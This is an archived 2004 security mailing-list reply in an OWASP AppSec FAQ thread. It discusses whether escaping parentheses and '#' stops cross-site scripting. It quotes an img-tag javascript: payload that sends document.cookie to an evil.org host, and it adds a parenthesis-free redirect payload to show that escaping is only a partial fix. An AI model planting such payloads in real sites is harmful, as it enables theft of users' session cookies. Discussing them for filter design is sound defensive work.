WebApp Sec mailing list archives

RE: AppSec FAQ at OWASP

From: Ulf Härnhammar <Ulf.Harnhammar.9485 () student uu se>
Date: Thu, 29 Jan 2004 15:18:25 +0100

Quoting Sangita Pakala <sangita.pakala () paladion net>:

Why is it important to escape "(", ")" and "#"?

<img src=
"Javascript:window.open('http://www.evil.org?cookie='+document.cookie)">
Escaping the "(" and ")" above renders the function call mute.


Oh, I see.

On the other hand, <img src="javascript:self.location.href='http://whatever'";>
doesn't have any "(" or ")" characters, so it's not a complete solution, but a
partial one.

-- 
Ulf Härnhammar
 student, Uppsala universitet
 redaktör, idiosynkratisk ( http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )

Current thread:

AppSec FAQ at OWASP Sangita Pakala (Jan 28)
- <Possible follow-ups>
- RE: AppSec FAQ at OWASP Sangita Pakala (Jan 29)
  - RE: AppSec FAQ at OWASP Ulf Härnhammar (Jan 29)
  - Re: AppSec FAQ at OWASP オマルイスマイル (Jan 29)
    - Re: AppSec FAQ at OWASP Laurian Gridinoc (Jan 30)